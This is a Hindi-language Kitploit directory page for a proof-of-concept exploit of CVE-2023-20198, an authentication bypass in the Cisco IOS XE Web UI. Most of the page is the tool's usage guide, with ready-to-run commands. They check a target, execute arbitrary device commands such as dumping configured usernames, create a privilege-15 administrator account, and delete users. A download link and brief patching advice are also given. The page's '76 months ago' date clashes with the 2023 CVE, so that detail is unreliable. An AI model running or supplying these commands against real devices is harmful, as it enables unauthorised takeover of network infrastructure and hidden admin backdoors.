Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-20198-Exploit — प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2023-20198 के लिए, एक प्रमाणीकरण बायपास भेद्यता जो Cisco IOS XE Web UI को प्रभावित करती है | Kitploit
उपकरण/GitHubGitHub/gill-singh-a/cve-2023-20198-exploit
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubgill-singh-a/cve-2023-20198-exploit

CVE-2023-20198-Exploit

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2023-20198 के लिए, एक प्रमाणीकरण बायपास भेद्यता जो Cisco IOS XE Web UI को प्रभावित करती है

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
76 महीने पहलेअभी तक समीक्षित नहीं

सिस्को IOS XE प्रमाणीकरण बाईपास (CVE-2023-20198)

यह रिपॉजिटरी CVE-2023-20198 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट रखता है, जो सिस्को IOS XE वेब UI को प्रभावित करने वाली एक प्रमाणीकरण बाईपास भेद्यता है।

यह भेद्यता अप्रमाणित हमलावरों को तैयार किए गए SOAP अनुरोधों के माध्यम से संवेदनशील सिस्को उपकरणों पर मनमाने कमांड निष्पादित करने की अनुमति देती है, जिससे पूर्ण उपकरण समझौता हो सकता है, जिसमें दूरस्थ कमांड निष्पादन और प्रशासनिक उपयोगकर्ताओं का निर्माण/हटाना शामिल है।

भेद्यता अवलोकन

  • CVE: CVE-2023-20198

  • प्रभावित उत्पाद: सिस्को IOS XE (वेब UI / WSMA इंटरफ़ेस)

  • प्रभाव:

    • प्रमाणीकरण बाईपास
    • दूरस्थ कमांड निष्पादन (RCE)
    • अनधिकृत उपयोगकर्ता निर्माण
    • अनधिकृत उपयोगकर्ता हटाना
  • हमला वेक्टर: नेटवर्क (HTTP/HTTPS)

  • आवश्यक विशेषाधिकार: कोई नहीं (अप्रमाणित)

यह भेद्यता वेब सेवा प्रबंधन एजेंट (WSMA) एंडपॉइंट में अनुचित प्रमाणीकरण हैंडलिंग के कारण होती है, जो हमलावरों को तैयार किए गए HTTP अनुरोधों का उपयोग करके प्रमाणीकरण को बायपास करने की अनुमति देती है।

आवश्यकताएँ

  • Python 3.x
  • requests
  • colorama

निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install -r requirements.txt

उपयोग

root@kitploit:~
usage: main.py [-h] -t TARGET [-c] [-C CMD] [-a] [-d] [-u USERNAME] [-p PASSWORD]

Authentication Bypass Exploit for Cisco IOS XE Devices (CVE-2023-20198)

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target Cisco IOS XE Device
  -c, --check           Check if the Target is vulnerable to CVE-2023-20198
  -C CMD, --cmd CMD     Cisco IOS XE Command to Execute
  -a, --add             Add New Username and Password
  -d, --delete          Delete existing User
  -u USERNAME, --username USERNAME
                        Username for Account Creation
  -p PASSWORD, --password PASSWORD
                        Password for Account Creation (Random Password Generated if not Provided)

उपयोग

कमांड लाइन विकल्प

भेद्यता जाँच

जाँच करें कि क्या लक्ष्य संवेदनशील है:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -c

भेद्यता जाँच

यदि संवेदनशील है, तो उपकरण स्वचालित रूप से शोषण योग्य WSMA एंडपॉइंट का पता लगाएगा और उपकरण विवरण प्रदर्शित करेगा।

दूरस्थ कमांड निष्पादन

संवेदनशील उपकरण पर कमांड निष्पादित करें:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -C "<COMMAND>"

उदाहरण:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -C "show running | include username"

शोषण

प्रशासनिक उपयोगकर्ता जोड़ें

एक नया विशेषाधिकार 15 प्रशासक उपयोगकर्ता बनाएँ:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -a -u cisco -p kaptaan

खाता निर्माण

यदि कोई पासवर्ड प्रदान नहीं किया गया है, तो स्क्रिप्ट स्वचालित रूप से एक यादृच्छिक सुरक्षित पासवर्ड उत्पन्न करती है।

वेब इंटरफ़ेस तक पहुँचना

नवनिर्मित खाते के साथ, आप उपकरण के वेब UI तक पहुँच सकते हैं

वेब UI

मौजूदा उपयोगकर्ता हटाएँ

मौजूदा उपयोगकर्ता हटाएँ:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -d -u cisco

खाता हटाना

पहचान और शमन

  • सिस्को IOS XE को नवीनतम पैच किए गए संस्करण में अपग्रेड करें

  • यदि आवश्यक नहीं है तो वेब UI अक्षम करें:

    root@kitploit:~
    no ip http server
    no ip http secure-server
    
  • ACLs के माध्यम से प्रबंधन पहुँच को प्रतिबंधित करें

संदर्भ

  • सिस्को सलाह — CVE-2023-20198
  • NVD: CVE-2023-20198
  • सिस्को IOS XE WSMA दस्तावेज़ीकरण
  • सुरक्षा अनुसंधान समुदाय रिपोर्ट
टूल डाउनलोड करें
विकल्पविवरण
-t, --targetलक्ष्य सिस्को IOS XE उपकरण (आवश्यक)
-c, --checkजाँचें कि क्या लक्ष्य संवेदनशील है
-C, --cmdसिस्को IOS XE कमांड निष्पादित करें
-a, --addनया प्रशासनिक उपयोगकर्ता जोड़ें
-d, --deleteमौजूदा उपयोगकर्ता हटाएँ
-u, --usernameखाता निर्माण/हटाने के लिए उपयोगकर्ता नाम
-p, --passwordनए खाते के लिए पासवर्ड (यदि प्रदान नहीं किया गया तो यादृच्छिक)